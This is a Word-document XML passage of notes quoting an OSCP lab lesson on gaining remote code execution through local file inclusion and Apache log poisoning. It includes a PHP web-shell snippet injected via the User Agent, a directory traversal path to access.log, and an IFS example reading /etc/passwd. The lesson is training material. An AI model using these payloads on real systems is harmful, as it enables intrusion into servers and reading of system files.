      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D11">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP (9.2.1 Local File Inclusion (LFI))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following example, our goal is to obtain Remote Code Execution (RCE) via an LFI vulnerability. We will do this with the help of Log Poisoning. Log Poisoning works by modifying data we send to a web application so that the logs contain executable code. In an LFI vulnerability scenario, the local file we include is executed if it contains executable content. This means that if we manage to write executable code to a file and include it within the running code, it will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following case study, we will try to write executable code to Apache's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/apache2/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory. We'll first need to review what information is controlled by us and saved by Apache in the related log. In this case, "controlled" means that we can modify the information before we send it to the web application. We can either read the Apache web server documentation or display the file via LFI.</w:t>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t xml:space="preserve">Let's use curl to analyze which elements comprise a log entry by displaying the file access.log using the previously found directory traversal vulnerability. This means we'll use the relative path of the log file in the vulnerable "page" parameter in the "Mountain Desserts" web application.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="336" name="image342.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image342.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 13 shows that the</w:t>
      </w:r>
      <w:hyperlink r:id="rId585">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId586">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">User Agent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is included in the log entry. Before we send a request, we can modify the User Agent in Burp and specify what will be written to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apart from the specified file, this command is equivalent to the directory traversal attack from the previous Learning Unit. The exploitation of directory traversal and LFI vulnerabilities mainly differs when handling executable files or content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's start Burp, open the browser, and navigate to the "Mountain Desserts" web page. We'll click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link at the bottom of the page, then switch back to Burp and click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab. Let's select the related request and send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="158" name="image146.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image146.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58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t xml:space="preserve">We can now modify the User Agent to include the PHP code snippet of the following listing. This snippet accepts a command via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter and executes it via the PHP</w:t>
      </w:r>
      <w:hyperlink r:id="rId588">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId589">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function on the target system. We'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId590">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId591">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">echo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display command output.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 14 - PHP Snippet to embed in the User Agent</w:t>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t xml:space="preserve">After modifying the User Agent, let's click Send.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59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t xml:space="preserve">The PHP code snippet was written to Apache's access.log file. By including the log file via the LFI vulnerability, we can execute the PHP code snippet.</w:t>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t xml:space="preserve">To execute our snippet, we'll first update the page parameter in the current Burp request with a relative path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../../var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 15 - Relative Path for the "page" parameter</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also need to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to the URL to enter a command for the PHP snippet. First, let's enter the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to verify that the log poisoning is working. Since we want to provide values for the two parameters (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the relative path of the log and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for our command), we can use an ampersand (&amp;) as a delimiter. We'll also remove the User Agent line from the current Burp request to avoid poisoning the log again, which would lead to multiple executions of our command due to two PHP snippets included in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D30">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The final Burp request is shown in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section of the following Figure. After sending our request, let's scroll down and review the output in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 10: Output of the specified ls command through Log Poisoning" id="348" name="image345.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 10: Output of the specified ls command through Log Poisoning" id="0" name="image345.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId593"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 10: Output of the specified ls command through Log Poisoning </w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 shows the output of the executed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command that was written to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file due to our poisoning with the PHP code snippet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D34">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's update the command parameter with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 11: Using a command with parameters" id="57" name="image58.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 11: Using a command with parameters" id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId594"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 11: Using a command with parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D36">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section shows that our input triggers an error. This happens due to the space between the command and the parameters. There are different techniques we can use to bypass this limitation, such as using</w:t>
      </w:r>
      <w:hyperlink r:id="rId595">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId596">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Input Field Separators</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IFS) or</w:t>
      </w:r>
      <w:hyperlink r:id="rId597">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId598">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With IFS, we can change how a space is interpreted. as shown here:</w:t>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IFS=' '  # Set IFS to space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">input="cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
